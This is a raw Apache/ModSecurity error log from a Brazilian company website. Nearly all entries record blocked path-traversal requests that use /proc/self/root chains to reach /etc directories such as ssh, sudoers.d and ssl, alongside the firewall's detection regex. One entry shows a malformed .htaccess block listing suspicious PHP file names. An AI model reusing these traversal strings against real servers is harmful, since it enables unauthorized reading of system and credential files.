https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:50.643129 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.128:42232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIwqBJNF7axNlVR0UWVQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:52.124082 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.128:54114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIxNCmCSWTlPouqorjvAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:54.686069 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.243.128:54128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIxcU6Sx0TG1YjmQitygAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:57.018787 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.243.128:54132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIyL-sgTmmJoPuMdy14wAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:00:59.195526 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.243.128:54148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmIy8U6Sx0TG1YjmQit0gAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:01:07.081838 2026] [proxy_fcgi:error] [pid 6296:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:01:09.059646 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.243.128:59272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmI1at8Nd0UC_OcbVHKYwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:01:10.544903 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.128:42576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmI1qt8Nd0UC_OcbVHKZQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:01:13.953781 2026] [core:alert] [pid 18380:tid 140411666392832] [client 74.7.241.31:51198] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/log
[Tue Mar 17 14:01:29.117877 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:01:33.995126 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.128:42576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmI7at8Nd0UC_OcbVHKewAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:01:34.515441 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.243.128:42576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmI7qt8Nd0UC_OcbVHKfgAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:01:51.139675 2026] [proxy_fcgi:error] [pid 17965:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:02:14.125523 2026] [proxy_fcgi:error] [pid 6296:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:02:36.061851 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:02:38.963222 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:45184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJLvPqhzTj3BvfDX-HcAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Tue Mar 17 14:02:58.138763 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47018] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:02:59.446147 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.128:35554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJQ6BJNF7axNlVR0UWhwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:01.056641 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.243.128:50246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJRfPqhzTj3BvfDX-HggAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:01.067038 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.244.43:36600] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmJQxj0p0SRWAqcjGF5PgAAAw0"]
[Tue Mar 17 14:03:01.070805 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.228.61:44842] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmJRHIk7brgkOH-rIWLmQAAAUc"]
[Tue Mar 17 14:03:02.835261 2026] [:error] [pid 30223:tid 140411599251200] [client 74.7.243.128:50250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJRsT4LuLykoMK_89oGAAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:04.559461 2026] [:error] [pid 29359:tid 140411716749056] [client 74.7.243.128:50254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJSKSy22zYCMGxsIlcWAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:05.938481 2026] [:error] [pid 29826:tid 140411658000128] [client 74.7.243.128:50268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJSRltFzTUElcKTdKyvQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:08.609551 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.243.128:50272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJTPPqhzTj3BvfDX-HhAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:09.980530 2026] [:error] [pid 30223:tid 140411548894976] [client 74.7.243.128:35696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJTcT4LuLykoMK_89oHAAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:11.931269 2026] [:error] [pid 28879:tid 140411607643904] [client 74.7.243.128:35702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJT1DN3UhJjLukrK-K1gAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:13.770848 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.243.128:35718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJUb-sgTmmJoPuMdy2MwAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
